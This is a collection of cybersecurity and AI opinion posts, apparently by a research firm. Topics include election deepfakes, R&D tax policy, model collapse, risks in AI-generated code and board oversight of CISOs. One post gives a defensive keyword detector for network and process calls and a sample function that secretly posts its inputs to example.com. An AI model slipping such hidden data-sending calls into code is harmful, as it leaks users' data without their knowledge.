The Next Generation of Identity Theft is Identity Hijacking

In 2024, AI will run for President, the Senate, the House, and for governor in several states.  Not as a named candidate, but by pretending to be real candidates.  What started as fake pictures of politicians has evolved into fake recordings of candidates' voices.  Fake videos are not far behind.

In 2023 we saw fake pictures of former President Trump fighting police in front of a NYC courthouse.  Those were widely shared on social media (often without the original attribution explaining that they were created as an example of what AI-generated images can do).  Now we have AI recreating President Biden's voice as part of a robocall campaign to trick people into not voting in the primaries.

We've gone from worrying about politicians lying to us to scammers lying about what politicians said...and backing up their lies with AI-generated fake "proof".  Make no mistake about it, this is a scam.  Not to steal money, but to steal votes.  This same technology has been used to recreate the voices of kids claiming to have been abducted so fraudsters could extort a ransom for kidnappings that never happened.  It's "identity hijacking", the next generation of identity theft, in which your digital likeness is recreated and taken places you never wanted to go.

Fake videos of politicians giving speeches that never happened or falsely confessing to crimes are not far behind.  Don't think so?  Ask yourself why the Screen Actors Guild went on strike.  One key demand is that AI not be used to recreate actors, because the fakes are realistic enough that the actors would never need to be hired again.  Social media will be the delivery system for many political scams, but as the latest robocalls showed, there are other ways to reach out and trick voters.

There are several efforts underway to combat this, for those who want to check whether a call or video is genuine.  Most have significant shortcomings.  One promising area that CTM is focused on is continuously proving that the words you hear were actually said by the person they appear to come from.  These word fingerprints break disinformation scams and identity hijacking.

If we build the right defenses, AI may be able to run for office, but we can keep it from winning.

Portions of this blog were first used in an interview with TheStreet.com

Congress Declares War on American Innovation

Congress has two main powers granted by the US Constitution: to tax and to declare war.  Little did the founders know that someday these powers would be combined, using taxation to declare war on American innovation.

Section 174 of the tax code did exactly that. 

Previously, companies that innovated through research and development (R&D) were able to deduct those expenses against revenue and pay tax on their actual profits.  But the law was changed as part of the “Tax Cuts and Jobs Act of 2017”; effective tax year 2022, money actually spent on R&D cannot be “expensed”.  It has to be spread (amortized) across 5 to 15 years.  The effect is to lower reported costs and inflate the paper profits that get taxed.  Even though the money has actually been spent on engineers and patents, companies have to pretend they kept most of it as profit and pay taxes on cash they don’t have.  Expenses like advertising can be immediately deducted, but not R&D.  Eventually, companies catch up on year one’s expenses and can start working through year two’s.  Until then, it’s an artificial tax bubble for the government.
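A simplified, hypothetical example makes the arithmetic concrete (illustrative numbers only, ignoring details like the mid-year convention and state taxes):

```python
# Hypothetical numbers to illustrate Section 174's effect on year-one taxes.
revenue = 1_000_000          # cash the company brought in
rd_spend = 800_000           # cash actually paid out for R&D (engineers, patents)
other_costs = 100_000        # non-R&D expenses, still fully deductible
tax_rate = 0.21              # federal corporate rate

# Before the change: R&D expensed immediately.
old_taxable = revenue - rd_spend - other_costs      # 100,000 of real profit
old_tax = old_taxable * tax_rate                    # 21,000

# After the change: R&D amortized, so only 1/5 is deductible in year one
# (the actual first-year rule is even harsher than this sketch).
new_taxable = revenue - rd_spend / 5 - other_costs  # 740,000 of "paper" profit
new_tax = new_taxable * tax_rate                    # 155,400

cash_left_over = revenue - rd_spend - other_costs   # only 100,000 actually on hand
print(f"old tax: {old_tax:,.0f}  new tax: {new_tax:,.0f}  cash profit: {cash_left_over:,.0f}")
```

In this sketch the year-one tax bill exceeds the cash the company actually kept, which is exactly the squeeze described next.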

Companies that invest a large amount in innovation relative to their revenue can actually owe more in taxes than their cash profits.  This is especially true for small companies that are inventing new technologies.

CTM is one such company.  We don’t sell products, we are a research lab that invents new ways to defend against cyber attacks.  Our largest costs are R&D.  As a result, in 2022 almost every dollar made was paid back out in taxes.  When people ask me what I do, I now say “I work for the government”.  CTM has always focused on our mission over profits, but the risk of paying more in taxes than we actually bring in makes this a charity.

You might think that this can’t be correct; that the government didn’t intend to discourage American innovation by making it unprofitable.  You might further think innovation in areas like protecting against AI-generated identity theft, ransomware, and fraud, and securing cloud data are examples of things they would want to encourage.  At the very least, maybe not discourage.  Apparently, you (and I) would be wrong.  The Tax Cuts and Jobs Act is taxing American innovation out of existence.

Some in Congress, from both political parties, realized that this might have been a mistake.  In late 2022 and early 2023 they tried to amend the law to roll back this provision.  Their efforts failed because neither political party would work with the other.  Twice.  A third attempt is now underway, but polarized partisan politics combined with an election year make success unlikely.

One “solution” proposed was to shut down CTM as a US company and reopen it in another country.  If the new company never hired US engineers or generated US income (only licensed innovations to non-American companies), it wouldn’t be subject to gimmicks in the US tax code.  US jobs would be shifted offshore.  We could rename the law the “Tax Increase and Jobs Elimination Act”.

The other solution is to simply stop investing in new innovation.  CTM has a portfolio of patents and other IP that we’ve created over the years.  We can shift our focus from invention to licensing.  Sales costs can still be expensed.

So that’s the plan.  Effective January 1st, 2024 we are slashing our R&D budget.  We will focus instead on licensing IP we’ve already created.  If Congress ever decides to revisit its decision, we will revisit ours.  Until then, let’s talk if you are interested in completely new ways to secure software supply chains, identify manipulated images, stop ransomware from encrypting files, protect against AI creating interactive deepfakes, or anything else we’ve been working to solve.

Congress may have declared war on American innovation, but we can unilaterally freeze our innovation work to force a cease fire.

 

A version of this post first appeared as an op-ed in ROI-NJ

A 2024 Prediction: Sentient AI Won't Destroy the World, That’s a Job for Humans

Despite alarming headlines, why I’m more worried about evil humans with AI than about evil AI

It's been about a year since ChatGPT brought generative AI into mainstream awareness.  Despite impressive results from Large Language Models and diffusion-based image generators, coupled with recent claims of advances toward independently thinking "general AI", we are not on the precipice of AI taking over and destroying humanity.

A fairly safe bet is that in 2024, smart computers won't decide to rid themselves of pesky humans by launching nukes.  I'm not saying computers can’t be wired up to try to guess launch codes, only that we aren't likely to configure them to do that (we haven't thought it was a good idea to date) and that AI lacks the ability to independently decide to do so, today and for the foreseeable future.

"But I've used AI and it does think, it can reason and respond", say some.  Not so, it offers the illusion intelligence.  How?  By looking for patterns of words (and bits of words) that appeared adjacent throughout the millions of documents used to train it.  If you ask for an apple pie recipe, it will have seen words like apple and pie and recipe near each other while being trained, and know that they tend to be near words like cinnamon, sugar, apples, bake, 300, degrees, and oven.  The genius of these systems is their ability to do association of billions of "factors" when fed massive amounts of training docs scraped from the Internet.  

It's inference at scale, not reason.  At best, it's what The Economist called "pseudo cognition".
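To see the flavor of it, here is a toy sketch (nothing like a real LLM's scale, training, or architecture) of predicting the next word purely from which words appeared next to each other in training text:

```python
from collections import defaultdict, Counter

# A tiny "training corpus" standing in for the millions of documents a real model sees.
corpus = ("preheat the oven to 350 degrees . mix the apples with cinnamon "
          "and sugar . bake the pie").split()

# Count which word follows which (a bigram table; real models weigh billions of factors).
following = defaultdict(Counter)
for current_word, next_word in zip(corpus, corpus[1:]):
    following[current_word][next_word] += 1

def predict(word: str) -> str:
    """Return the word most often seen right after `word` during training."""
    return following[word].most_common(1)[0][0]

print(predict("the"))  # emits whichever word most often followed "the" in the corpus
```

The output looks like knowledge of recipes, but it is only adjacency statistics scaled up.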

That doesn't mean we are safe from harm caused by this new tool.  Any tool can be used for good or evil.  Like a calculator, AI lets humans do things more quickly.  The ability to scale up efforts can be good when trying to cure disease or bad when trying to inflict harm.  AI is already being used by scammers and ransomware attackers to send fraudulent emails, to scan the internet for vulnerabilities to exploit, and to impersonate real people for fake extortion schemes.  We can't stop AI's use by bad actors.  It lets them do what they already do, just faster and at scale.

So what can we do?  Knowing that attackers have tools that scale up their capabilities, we can scale up our ability to detect and defend against them.  In some cases that means putting AI's ability to detect attack patterns to work for us.  In other cases, we can leverage new technologies to know whether the person on the phone or in a video is real and really saying the words we hear.  And we can seek to exploit what Beaumont Vance refers to as the “Achilles heel” of any pattern matching system by introducing nonsense that doesn't match any pattern it's been trained on and observing the result (Beaumont's version of a new Turing test).

My prediction for AI in 2024 is simple.  As a tool it will continue to evolve and improve, like any new tech.  What it won't do is evolve into an evil consciousness that wants to take over the world.  We have plenty of pesky humans for that, who will use AI to amplify what they already do.

Is ChatGPT writing your code? Watch out for malware

If yours is like many companies, hackers have infiltrated a tool your software development teams are using to write code.  Not a comfortable place to be.

Developers have long used sites like stackoverflow.com as forums where they could get code examples and assistance.  That community is rapidly being replaced by generative AI tools such as ChatGPT.  Today, developers ask AI chatbots to help create sample code, translate from one programming language to another, and even write test cases.  These chatbots have become full-fledged members of your development teams.  The productivity gains they offer are, quite simply, impressive.

Only one problem: how did your generative AI chatbot team-members learn to code?  Invariably by reading billions of lines of open-source software, which is full of design errors, bugs, and hacker-inserted malware.  Letting open-source code train your AI tools is like letting a bank-robbing getaway driver teach high school driver's ed.  It has a built-in bias to teach something bad.

There are well over a billion open-source contributions annually to various repositories.  GitHub alone had over 400 million in 2022.  That's a lot of opportunity to introduce bad code, and a huge "attack surface" to try to scan for issues.  Once open-source code has been used to train an AI model, the damage is done.  Any code generated by the model will be influenced by what it learned.

Code written by your generative AI chatbot and used by your developers can and should be closely inspected.  Unfortunately, the times your developers are most likely to ask a chatbot for help are when they lack sufficient expertise to write the code themselves.  That means they also lack the expertise to understand if the code produced has an intentionally hidden backdoor or malware.

I asked LinkedIn how carefully people inspect the quality and security of the code produced by AI.   A couple of thousand impressions later, the answers ranged from "very, very carefully", to "this is why I don’t use generative AI to generate code", "too early to use" and "[too much risk of] embedded malware and known design weakness".  But the fact remains that many companies ARE using generative AI to help code, and more are jumping on the bandwagon.

So what should companies do?  First, they need to carefully inspect and scan code written by generative AI.  The types of scans used matter; don’t assume that generative AI malware will match well-known malware signatures.  Generated code changes each time it's written.  Instead, use “static” behavioral scans and Software Composition Analysis (SCA) to see if generated software has design flaws or will do malicious things.  It also isn’t a good idea to let the same generative AI that produces high-risk code write the test cases to see if the code is risky.  That's like asking a fox to check the henhouse for foxes.
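As one narrow illustration of a behavioral check (a toy sketch, not a replacement for real SCA and static analysis tooling), generated code can be parsed and flagged when it references capabilities it has no business using, such as network or process calls in a simple utility:

```python
import ast

# Modules and calls that deserve a closer look in code that shouldn't need them.
SUSPICIOUS = {"socket", "urllib", "requests", "subprocess", "os", "exec", "eval"}

def flag_suspicious(source: str) -> list[str]:
    """Return risky modules/calls referenced by a piece of generated code."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS:
                    findings.append(f"imports {alias.name}")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS:
                findings.append(f"calls {node.func.id}()")
    return findings

# A generated "adder" that also phones home should set off alarms.
generated = (
    "import requests\n"
    "def add(a, b):\n"
    "    requests.post('http://example.com', json={'a': a})\n"
    "    return a + b\n"
)
print(flag_suspicious(generated))  # ['imports requests']
```

The point is not this particular list of keywords; it is that the review step should look at what the code does, not just whether it compiles.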

While the risks of generating bad code are real, so are the benefits of coding with generative AI.  If you are going to trust generated code, the old adage to "trust, but verify" applies.

 

A version of this post first appeared in Infoworld. Reprinted with permission. ©IDG Communications, Inc., 2023. All rights reserved. https://www.infoworld.com/article/3709191/is-chatgpt-writing-your-code-watch-out-for-malware.html

Back to the Future: Generative AI may return us to the 1990s

If I told most people that I was building a new system that could change the world, they would likely want to hear more.  If I then said that it had a few issues like exponential growth in costs, supply chain limitations, and potential legal problems, the discussion would probably end.  Quickly.  That’s increasingly where we find ourselves with Generative AI.

Training AI is expensive

Many scientists have observed that we may be approaching the limits of using online data to train Large Language Models (LLMs) with massive numbers of “parameters”, used to establish relationships between bits of words (“tokens”).  As the number of parameters has exploded from millions to hundreds of billions, the processing power required has grown exponentially.  Since these models need huge amounts of data to learn from, crawlers try to consume the entire Internet.  We have massively complex models ingesting massively larger amounts of data.

The cost (time and electric power) to train models is becoming unsustainable.  Using rented processors, training a modern, general-purpose model from scratch on today’s data sets can cost tens of millions of dollars.

We are running out of good training data

In addition to cost issues, there may be limits on how much data we can feed AI.  As big as it is, the Internet isn’t infinite.  Once your massive models have scraped all available online data, what’s left to train with?  An often-cited paper projects we may start running out of training data as early as 2030 (arXiv:2211.04325 [cs.LG]).

When you are out of new data to ingest, you either stop training or you begin to consume output that was synthesized by other AI.  Stopping freezes learning.  Training from synthesized data puts you in a sort of echo chamber; your models can quickly spiral into learning from the errors produced by others, which create new errors that are again used to train others.  This is referred to as model collapse (arXiv:2305.17493 [cs.LG]).  It’s inbreeding with data, and probably won’t end well.
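A toy simulation (a deliberately crude caricature of the dynamic, not the experiments in the cited paper) shows how training each generation only on the previous generation's output narrows what survives:

```python
import random

# Generation 0: "real" data -- 1000 distinct values standing in for the
# variety of human-written content on the Internet.
data = list(range(1000))

for generation in range(1, 11):
    # Each new "model" learns only from the previous model's output: here it
    # simply reproduces samples of what it was trained on (resampling with
    # replacement), the crudest possible stand-in for generation.
    data = [random.choice(data) for _ in range(1000)]
    print(f"generation {generation}: {len(set(data))} distinct values remain")

# Rare values vanish and can never come back: each generation knows a little
# less of the original variety than the one before -- data inbreeding.
```

Run it and the count of distinct values falls generation after generation, which is the echo chamber in miniature.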

And “content creators” are increasingly taking steps to limit the use of their work to train models they will compete with (one of the demands behind Hollywood’s actors and writers strike is that AI not be used to displace them).  This will further limit the amount of training data available. 

Training data might be illegal to use

Content creators aren’t just looking to block their work from being scraped.  They are suing and claiming that AI trained on their work is producing “derivative” works.  The courts must decide where the line is between a derivative work and an original work that has been immaterially influenced by exposure.  If I paint an original picture, I'm probably influenced by every painting I've ever seen.  That isn't considered misuse of all prior painters' IP.  The closer I get to copying an individual work, the closer I come to creating a derivative work.  Is it different when a machine does the same thing?  Probably not, but the lines haven’t been drawn.  Yet.

Once the courts and Congress do draw lines, what happens to all the AI models that have been contaminated by training with material that (retroactively) isn’t allowed?  It’s a big enough concern that Microsoft announced they will assume copyright infringement risks related to customers' use of their AI “Copilot” service.  There is also an emerging area called "machine unlearning", where you try to get a model to forget something without starting over.  It’s like taking poison back out of a well.  Watch that space closely.

Taken together

Where are we?  Costs to consume massively larger data sets are becoming too high.  Running out of “good” data to train with is a real possibility, and training from synthesized data is frightening. And training with scraped data today has risks that your models won’t comply with future law.

Back to the Future

Solving these issues may require a trip to the past.  In the 1990s we did “data analytics” with much smaller amounts of data, and used it to generate predictions like customer buying trends.  The algorithms were complex and we had to make sure the data was highly accurate as “garbage in gave garbage out”.  We had small, curated data sets with complex algorithms to tease out value.

Then came the era of “big data”, enabled by social media and automation.  As available data grew quickly, we simplified our analytics to look for patterns and clusters and began to personalize predictions.  We no longer needed “clean” data, we just needed it “unbiased” and relevant to a specific task. 

LLMs began to scrape the Internet to learn everything, unconstrained by a specific task, so the inputs grew from “big data” to “huge data”.  There’s a lot of inaccurate data online, but also a lot of counter-data to remove bias thanks to the wisdom of the crowd. 

As training costs grow unsustainably, and we exhaust available and usable sources, future LLM training will be constrained to learn from smaller amounts of new data.  That will require more sophisticated approaches, such as augmenting LLMs with supervision and labeled data.  More complex techniques using smaller data sets will once again require more accurate data to minimize errors.

Data lineage and curation will again grow in importance.  I may start with a pre-trained LLM and carefully supplement the training with highly focused additional data through “transfer learning”.  I will likely want my new, focused data to have greater significance, increasing the importance of its accuracy.
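As a rough sketch of that transfer-learning pattern (shown with a small vision model for brevity rather than an LLM, and with made-up data standing in for a curated set), the expensive pre-trained layers stay frozen and the carefully curated data is spent only on a new task-specific layer:

```python
import torch
import torch.nn as nn
from torchvision import models

# Start from a model someone else already paid to pre-train.
model = models.resnet18(weights="IMAGENET1K_V1")

# Freeze the pre-trained layers; they already encode general knowledge.
for param in model.parameters():
    param.requires_grad = False

# Replace the final layer with one sized for a narrow task (say, 5 classes)
# and train only that layer on the small, carefully curated data set.
model.fc = nn.Linear(model.fc.in_features, 5)
optimizer = torch.optim.Adam(model.fc.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

# One illustrative training step on a (hypothetical) curated batch.
images, labels = torch.randn(8, 3, 224, 224), torch.randint(0, 5, (8,))
optimizer.zero_grad()
loss = loss_fn(model(images), labels)
loss.backward()
optimizer.step()
```

Because only the small new layer learns, errors in the supplemental data propagate directly into the results, which is why its accuracy matters so much.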

In the end, we may find that our future is back in 1990s style data management.  Our algorithms will be swapped for models, but the importance of clean, curated data will grow.  Otherwise, our generative AI may generate costs, errors, and lawsuits…but not value.

 

When Generative AI Goes "Wrong"

A version of this first appeared in Private Company Director: https://www.privatecompanydirector.com/features/what-your-board-should-know-diving-ai

Most companies are rapidly working to develop an AI strategy, prompted in no small part by the success of “generative AI” tools like GPT.  For all of their business potential, it’s important to remember that their responses are sometimes very plausible and very wrong.  Over time, they may get better in some ways and intentionally worse in others.

Today’s wrong answers are largely unintentional, and happen for two reasons.  First, tools like Microsoft’s GPT-based Bing and Google’s Bard have been trained on huge amounts of data scraped from the Internet.  From this, they synthesize likely responses to questions.  Their breadth of coverage is stunning, but as any parent will tell you, it’s not a good idea to believe everything that’s posted online.  The Internet is full of unfiltered, biased information, misinformation, and sometimes disinformation.  Ask a question about medicine and you may get an answer sourced from a combination of peer-reviewed scientific journals and a blog from someone with an agenda to push.  If your training data is junk, so are your answers.  Microsoft’s first foray into AI chatbots was called Tay, and it was “trained” by interacting online.  Unfortunately, an online community trained it to be racist and homophobic.  Microsoft pulled the plug.

The second reason is that generative AI generates.  The act of synthesizing an answer includes extrapolating.  Simply put, that means inventing likely but made-up data.  In one recent example, an attorney in New York used ChatGPT to research legal precedents for a court filing.  ChatGPT generated 6 bogus court cases and even created fake excerpts of judicial opinions.  When challenged, ChatGPT insisted that the fake information was real.  The court ordered both the attorney and his firm to explain why they shouldn’t be penalized for the citation of “…non-existent cases…[and] judicial opinions”.

This doesn’t mean avoiding AI.  Generative AI like ChatGPT is changing the way people search.  Instead of returning thousands of relevant links to read, it has already “read” the material and synthesizes an answer.  As we grow to depend on synthesized answers, it’s worth remembering what we lose in this trade; we don’t get to see the data behind the answers.  Not having to slog through piles of results was the point, of course, but this lack of transparency means we don’t know the quality of the sources used or which references were invented.

Back when we got a pile of links, we could apply critical thinking to what we read.  If we knew the source had an agenda, we could take that into account.  Now, we get a result and we have to trust that the models were trained on unbiased data.  Trusting the quality is hard to do when most systems have been trained by crawling the Internet.  There is a massive amount of information to learn online, but some of it is massively wrong.

Why not train our own AI systems to ensure the data is unbiased?  There are two problems with that approach. 

First, the value of these systems is based on the vast amount of content they have been trained on.  Simply put, they know more, and can do more, because they consumed more.  Having to check and pre-screen everything isn’t practical if we want them to learn from everything possible.   Early tools, such as Wolfram Alpha, trained their systems on data that was carefully curated.  While accurate, their answers were limited in scope.  It’s why most people who’ve heard about ChatGPT haven’t heard about Wolfram Alpha.

The second issue is cost.  It’s been estimated that it costs millions of dollars to train a system like ChatGPT using rented, specialty processors from AWS.

If you have a narrow field of use, such as reading financial reports, you can curate specific data and train your own models.  For a general-purpose search engine replacement that seems to “know” about everything, it isn’t practical (just as it isn’t practical for everyone to build their own search engine).

As with Internet search, there will probably be only a handful of successful “GPT search engines”.  Small wonder that Microsoft and Google are rushing to be dominant players.  Nobody wants to be a future version of AltaVista.

Since this new type of general-purpose GPT search comes with the downside of not knowing whether its sources were wrong, it implies another issue: what if the sources are intentionally wrong or biased?  With traditional search we have “sponsored” results; people pay to promote their answers by placing them near the top of the pile.  How do search companies, who make money selling ads and promoting specific content, charge for a single answer?  When I ask “what’s the safest and most reliable car under $40,000?” in a GPT search engine, I have to understand that the answer might be biased or invented by accident.  Do I also have to worry that a car company might have “sponsored” the answer by paying to bias the training data and promote their product?

Hackers are already testing ways to intentionally bias AI training data and influence the answers these systems give.  Is it really a stretch to think that advertisers won’t want to intentionally bias the answers to make money?

What’s needed is either transparency into how answers were generated, eliminating the AI “black box”, or testing and certification that the data used to train AI models was unbiased.  Without that, we all need to double check the answers before buying that car.

 

Never buy a used hard drive

I recently purchased a new hard drive from Amazon to upgrade my desktop.  What I got was something that neither I nor the prior owner wanted.

Yes, prior owner.  When I went to install the drive, I noticed the “safety seal” was open.  As a security person, I found that concerning, but maybe I had opened it earlier and was just having a senior moment.

I plugged it in with a newly purchased USB adapter so I could copy my old hard drive to the new one, then fired up the copying software.  It warned me that the data on my new drive would be erased.  What data on my new drive?  Surely that’s a generic warning.

It wasn’t.  The drive had a prior owner’s data.  A presumably bootable copy of Windows, a few apps, and several browsers were all at my disposal.

My first reaction was annoyance that I was sold a used drive as new.  This was “shipped and sold by Amazon”, so it was a name-brand drive that I was buying from a known company.  Amazon sells these new or used, and they probably grabbed one from the wrong bin.  Hard drives wear out, and I didn’t want one whose useful life was diminished.  It’s also a fairly modern drive, so there was a concern that the prior owner experienced problems with it before returning it.  I definitely didn’t want someone else’s problem.

Then my cyber security experience kicked in. 

Reaction 1: “Great, now I have to scan my system for malware”.  It’s certainly not uncommon for used drives to have a virus.  Simply by plugging it in I could have been infected.

Reaction 2: “What if the adapter I bought was compromised?”  More likely those files were on the disk, since the seal wasn’t intact and they included browsers, but the brand-new USB-to-hard-drive adapter is from a company I had never heard of.  Any USB device, even a USB cable, can be hacked.  Your cable can become both a cable and an infected hard drive.  Would you notice?  Your mouse can become a keyboard that secretly types commands in the background.  Power bricks can (and sometimes do) connect to insecure Wi-Fi and grab copies of things like your account logins as they zip by in the air.  Hard drive controllers have been compromised to steal data or infect with malware, my concern here.  Even used routers have arrived with compromised code that sends copies of every online transaction to servers overseas.  Bottom line: don’t plug in anything unless it’s brand new and you know the seller is legitimate.  I made a mental note to check the adapter separately.

Reaction 3: “How come the data wasn’t erased?”  Anyone recycling or returning a drive should securely erase their data using a program that overwrites all files.  I didn’t look deeply, but it sure seemed like I had access to the files and browsing history of the prior owner.  Worse, if they stored passwords in their browser, I had those too.  Maybe they were lazy and assumed Amazon would erase the drive.  Maybe Amazon was lazy and assumed the prior owner did.  Maybe they both intended to and both screwed up.  The fact remains, if I had bad intentions the prior owner could have been in a world of hurt.  When I take an old spinning drive out of service, it gets a three-step treatment: hit with a hammer, holes drilled through the media, and then placed in e-waste recycling.  Flash drives get securely erased, broken, and then similarly disposed of.

I’m sending the used drive back to Amazon and a replacement is already on its way.  I plan to inspect it very carefully.

Why your business needs to pay attention to deepfakes

This article was published in Chief Executive Magazine

Last year, Bruce Willis appeared in a commercial for Megafon but never actually filmed it. James Earl Jones' voice was used in a Disney spinoff of Star Wars, but the recording was made after the actor had retired and stopped recording. A video of Elon Musk promoting Bitvex, a fake cryptocurrency site "he" claims to have founded, was used to scam investors, but Mr. Musk never made the video (or any of the other scam crypto site promotions he appears in). Just two months ago, Binance's Chief Communications Officer led an entire developer conference in which he encouraged people to collaborate with a group of scammers -- only it wasn't really him.

All of these are examples of so-called "deepfakes", in which realistic audio and video are produced without the participation of the person appearing in them. Artificial Intelligence (AI) continues to raise the bar on their quality. While these are generally one-way presentations, the time is fast approaching when they will be able to interact.

Why should a corporate CEO care? When is the last time you jumped on a call or video conference with your CFO or head of Accounts Payable? What if your team got a group voicemail, video message, or even a live video conference in which "you" told them to take an action that you never requested? Buy a product? Wire money? Make an announcement that would tank your share price to benefit short sellers? What if someone posted edited images of you on social media enjoying your competitors' products?

Deepfakes come in lots of flavors. Editing and splicing real sound and images to change the meaning is commonly used by groups ranging from Internet trolls to government disinformation campaigns. Creating entirely "synthetic" voice and video that never happened is a newer threat, and as it becomes interactive it will change how we trust what we see and hear.

It all started with modifying existing images and audio. At the end of the day, digital pictures and sound are just data. And as your security team will tell you, data can be stolen, corrupted, or changed (they call this the CIA model, in which attacks can affect data confidentiality, integrity, or availability). Deepfake integrity attacks have gotten better as AI has gotten better. The more voice and video available online from presentations and investor conferences, the more data to train malicious AI. Add to that the introduction of "Generative Adversarial Networks", AI that teaches AI to get better, and we end up with terrifyingly realistic results.

What can be done? First, we need to teach people to "trust but verify". We already know that fake emails pretending to come from an executive who urgently demands an unusual payment are cause for concern. It's called Business Email Compromise (BEC) and results in billions of dollars of fraud every year. We tell our teams that if a request seems odd, they need to make a call and confirm it. What if calls can't be trusted? The important thing is to check unusual requests using a completely different channel. If the request came in by Zoom, send a text to confirm, not a chat message in the Zoom session. If it came over the phone, send an email.

Second, we can reinforce that messaging with our own actions. When we ask someone in the company to do something a little out of pattern, we can say we will confirm it via email/text/voicemail...any channel but the one being used.

Finally, we can use tech to fight tech. Executive headshots on the website should be micro-fingerprinted to detect later misuse, and the brand protection company you hire should be one that uses those micro-fingerprints. We can add subtle background sounds to audio conferences to make them harder to use for training AI. And we can keep inventing and investing in new ways to defend our firms and our brands from the latest methods used to attack them.
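One simple illustration of the fingerprinting idea (ordinary perceptual hashing with the imagehash library and hypothetical file names; commercial micro-fingerprinting and brand-protection services are more robust than this) is to record a fingerprint of each published headshot and compare it against images found in the wild:

```python
from PIL import Image
import imagehash  # pip install imagehash pillow

# Fingerprint the headshot as published on the corporate site.
original = imagehash.phash(Image.open("ceo_headshot.jpg"))

# Later, fingerprint an image circulating online and compare.
suspect = imagehash.phash(Image.open("social_media_post.jpg"))

# Small distances suggest the suspect image is a copy or light edit of the
# original; large distances suggest it is probably unrelated.
distance = original - suspect
print(f"hash distance: {distance} "
      f"({'possible reuse' if distance <= 10 else 'probably unrelated'})")
```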

Five Questions Every Board Should Ask Their CISO

This article first appeared in Directors and Boards

Not all board members have cybersecurity expertise, but all can play a vital role in protecting their company’s sensitive information. It comes down to asking the right cybersecurity questions of the company’s chief information security officer (CISO), including questions on risk frameworks, threat actor profiles and appetite for customer friction.

The Role of CISOs

CISOs occupy a unique position within most companies since cybersecurity deals with motivated attackers who actively attempt to circumvent controls. Other forms of risk, such as a fire in a facility or a disruption in the supply chain, tend to be random. With motivated attackers, every vulnerability will eventually be found and exploited. The result is that some CISOs try to prevent all exploits, a mission that is both doomed to fail and potentially harmful to the business.

Boards (along with their CEOs) should communicate a different message to CISOs:

"First, we understand that it’s not feasible to eliminate all risks, and we don’t want to try. Instead, we want to manage risks intelligently and accept that there will be outlier events that we need to react to and recover from. The more likely the probability and more extreme the impact, the more the event needs to be mitigated. As long as risks are managed wisely, we won’t ‘shoot the messenger’ when told that an event has occurred.

“Part of managing risk wisely involves a cost-benefit analysis. Costs are not just economic – any friction added to the business or customer experience must be considered against the effectiveness of a control. The more a control negatively impacts users, the less valuable it is. This requires reducing the security benefit based on the friction created. And friction should be measured quantitatively so we can make a decision on the benefit of the control versus the impediment it creates for users."

Most cybersecurity leaders are measured on the strength of their controls, but few are incented to minimize impact to legitimate users. Every CISO should be.

With messaging established, boards can move on to governance. There are five questions every board should ask about their CISO’s strategy. Get these five right and your company will be ahead of the pack.

What frameworks do we use to manage risk, and how do we benchmark ourselves using these frameworks?

There is no shortage of security frameworks: ISO 27000 and COBIT focus on controls, CVE/CVSS scoring focuses on vulnerability measurement and ATT&CK zeroes in on threats. The value of these frameworks, when properly used, is that they provide a common language to describe risk and identify control gaps. Some frameworks also allow measurement of uncontrolled risk; these are especially useful to determine whether risks, over time, are increasing or decreasing, and to benchmark current state against others.

What types of threat actors are interested in attacking us, what are they motivated to do and how do we defend ourselves against their specific techniques?

It’s important to recognize that different types of attackers have different motives, which results in the use of different methods. Corporations and their boards must remember that the weapons they are defending against may not be the ones bad actors are planning to use. Put another way: There is little value in being able to block a punch if your attacker has a crossbow. Threat actors with financial motivations tend to rely broadly on ransomware, fraudulent invoicing and compromising accounts at financial institutions. Attackers trying to draw attention to a cause seek to disrupt businesses in a way that may be highly visible and potentially damaging to corporate reputation. Most nation-states preparing for cyber war try to silently embed themselves in critical infrastructure. Businesses should make basic assumptions on the type of attackers whose motives best align with them as a target and understand the methods they would likely use. Then, plan defenses against those specific techniques.

How much friction do we add to the customer and user experience?

This question is designed to encourage CISOs to think about the impact of their controls on legitimate users, including suppliers, vendors, partners and customers. It’s far easier to have great security if you are willing to create business impediments and customer friction, such as constantly challenging users to prove their identity or prohibiting the use of customer-friendly communication channels. At the same time, companies can fall behind competitors that don’t make life hard for customers. Inquiring about friction from the perspective of customers and other users forces security teams to ask themselves, “What friction are we creating?” They might not like the answer.

How do we discover sensitive data, and how do we protect it?

It’s hard to protect sensitive data if you don’t know where it is. Over time, controls intended to prevent data from being mishandled will have misses. It’s easy to copy and save data in the wrong place, new fields will be added to spreadsheets and databases that change their sensitivity, and people will forget to follow processes. The result is that your most sensitive data will spread to less secure desktops, laptops and cloud storage. Combating this requires continuous scanning to discover sensitive data where it shouldn’t be, and then taking corrective action.
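A minimal sketch of what such scanning means in practice (illustration only; real data-discovery tools use many more detectors plus validation, and the share path here is hypothetical): walk a file share on a schedule and flag files containing patterns that look like sensitive data.

```python
import re
from pathlib import Path

# Very rough patterns for illustration; production tools validate matches
# with checksums, surrounding context, and many more data types.
PATTERNS = {
    "US SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "possible card number": re.compile(r"\b(?:\d[ -]?){15,16}\b"),
}

def scan(root: str) -> None:
    """Flag text files under `root` that appear to contain sensitive data."""
    for path in Path(root).rglob("*.txt"):
        text = path.read_text(errors="ignore")
        for label, pattern in PATTERNS.items():
            if pattern.search(text):
                print(f"{path}: looks like it contains a {label}")

scan("/shared/finance")  # hypothetical file share swept on a recurring schedule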

Do you have the resources you need to be successful?

This question may sound obvious, but it needs to be asked. Sometimes a CISO’s budget allocation isn’t sufficient to manage risks properly. This is particularly true when organizations suffer from “recency bias,” the belief that if they haven’t had a recent breach, there isn’t a need to invest in new controls. Motivated attackers are constantly evolving their techniques. That means there is no sitting still when it comes to cybersecurity. CISOs must continually improve the company’s defenses to keep up with attackers.

Where to Invest in Cyber Security?  First Understand Attackers’ Motives

Companies Need to Understand Cyber Criminals’ Goals in Order to Properly Manage Risk

It seems like every week there is another cyber attack in the news, resulting in an insatiable appetite from technology teams to add new tools to protect their firms.  How should boards and non-technical executives decide where to spend time and money, since the essence of any great strategy is knowing what not to invest in?

Answering that question involves answering another one: who is doing these attacks, and why?

